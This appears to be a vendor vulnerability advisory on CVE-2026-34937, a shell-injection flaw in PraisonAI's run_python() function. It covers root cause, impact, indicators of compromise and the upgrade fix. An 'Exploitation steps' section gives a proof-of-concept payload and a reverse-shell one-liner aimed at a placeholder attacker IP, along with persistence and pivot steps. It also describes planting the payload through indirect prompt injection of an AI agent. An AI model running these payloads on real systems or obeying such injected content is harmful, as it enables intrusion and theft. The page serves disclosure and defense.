CVE-2026-34937: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-34937 is a shell injection vulnerability in the run_python() function of the PraisonAI praisonaiagents package, allowing arbitrary OS command execution via unescaped shell metacharacters. It affects praisonaiagents versions up to and including 1.5.89, with version 1.5.90 containing the fix. The vulnerability was published on March 31, 2026 by the maintainer and added to the GitHub Advisory Database on April 1, 2026. The GitHub Advisory assigns a CVSS v3.1 score of 7.8 (High) with a local attack vector, while Feedly's threat intelligence estimates a network-accessible score of 9.8 (Critical) (GitHub Advisory, PraisonAI Advisory).

Technical details

The root cause is CWE-78 (OS Command Injection): the run_python() function in execute_command.py constructs a shell command by interpolating user-controlled input directly into python3 -c "<code>" and passing it to subprocess.run(..., shell=True). The incomplete escaping logic only sanitizes backslashes (\) and double quotes ("), leaving $() command substitution and backtick expressions unescaped. Because the shell processes these metacharacters before Python is invoked, an attacker can inject arbitrary OS commands through the code parameter. The vulnerability is further aggravated by the auto-generated Flask server deploying with AUTH_ENABLED = False by default when no token is configured, making the function reachable without authentication (GitHub Advisory, PraisonAI Advisory).

Vulnerable code path:

# execute_command.py:290 (source)
def run_python(code: str, cwd=None, timeout=60):
    # execute_command.py:297 (hop) -- incomplete escaping
    escaped_code = code.replace('\\', '\\\\').replace('"', '\\"')
    command = f'{python_cmd} -c "{escaped_code}"'
    # execute_command.py:310 (sink) -- shell=True expands $() before python3 runs
    return execute_command(command=command, cwd=cwd, timeout=timeout)

Impact

Successful exploitation grants an attacker arbitrary OS command execution with the privileges of the praisonai process, resulting in high confidentiality, integrity, and availability impact. Any agent pipeline or API consumer that passes user- or task-supplied content to run_python() is fully exposed, including scenarios involving indirect prompt injection where an AI agent autonomously calls the function with attacker-controlled input. The default unauthenticated Flask server deployment significantly broadens the attack surface, potentially enabling lateral movement within the host environment or exfiltration of sensitive data accessible to the process user (GitHub Advisory, PraisonAI Advisory).

Exploitability

A public proof-of-concept exploit is available in the GitHub Security Advisory, demonstrating command execution via run_python(code='$(id > /tmp/injected)') on a real PraisonAI installation (PraisonAI Advisory). Feedly classifies the PoC confidence as high and confirms it is a real, standalone runnable exploit. There is no current evidence of in-the-wild exploitation, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.027–0.037%, placing it in the lower percentiles for near-term exploitation probability (GitHub Advisory).

Exploitation steps

  1. Reconnaissance: Identify exposed PraisonAI instances running praisonaiagents <= 1.5.89, particularly those with the auto-generated Flask server accessible on the network (default: AUTH_ENABLED = False).
  2. Identify the vulnerable endpoint: Locate any API endpoint or agent pipeline that accepts user-controlled input and passes it to the run_python() function in praisonai/code/tools/execute_command.py.
  3. Craft the injection payload: Prepare a code parameter value containing a $() command substitution, e.g., $(id > /tmp/injected) or a reverse shell payload such as $(bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1).
  4. Submit the payload: Send the crafted input to the target via the API, agent task, or indirect prompt injection (e.g., embedding the payload in content that an AI agent will process and pass to run_python()).
  5. Command executes: The shell expands $() before Python is invoked, executing the injected OS command as the praisonai process user.
  6. Verify and persist: Confirm execution (e.g., check /tmp/injected for output), then establish persistence or pivot within the environment as needed (GitHub Advisory, PraisonAI Advisory).

Indicators of compromise

  • Network: Unexpected outbound connections from the PraisonAI process to external IPs (potential reverse shell); unusual HTTP requests to the Flask API server with code parameters containing $(), backticks, or other shell metacharacters.
  • File System: Unexpected files created in /tmp/ or other world-writable directories (e.g., /tmp/injected); new scripts, cron jobs, or SSH authorized keys added by the praisonai process user; web shells or backdoors in accessible directories.
  • Logs: Flask/application access logs showing requests with shell metacharacters ($(), `) in code parameters; OS audit logs (e.g., auditd) recording unexpected bash, sh, curl, or wget processes spawned as children of the Python process.
  • Process: Unusual child processes of the Python/praisonai process (e.g., /bin/bash, nc, curl, wget, python3) executing system commands not consistent with normal agent operation (GitHub Advisory).

Mitigation and workarounds

Upgrade praisonaiagents to version 1.5.90 or later, which contains the patch for this vulnerability (GitHub Advisory). As interim mitigations: restrict network access to the PraisonAI Flask server and enable authentication (AUTH_ENABLED = True) if the server must be exposed; avoid passing untrusted or user-controlled input to run_python(); and refactor subprocess calls to use argument lists instead of shell=True to prevent shell metacharacter expansion. Input validation rejecting $(), backticks, and other shell metacharacters should also be implemented as a defense-in-depth measure (PraisonAI Advisory).

Community reactions

The vulnerability was reported by security researcher YeranG30 and published by the PraisonAI maintainer (MervinPraison) on March 31, 2026 (PraisonAI Advisory). Brief community discussion was noted on Mastodon via @thehackerwire, and the CVE was picked up by several vulnerability tracking services including VulDB, CVEFeed, and Red Hat's CVE database shortly after disclosure. No major vendor statements or significant media coverage beyond standard CVE aggregation have been identified.

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management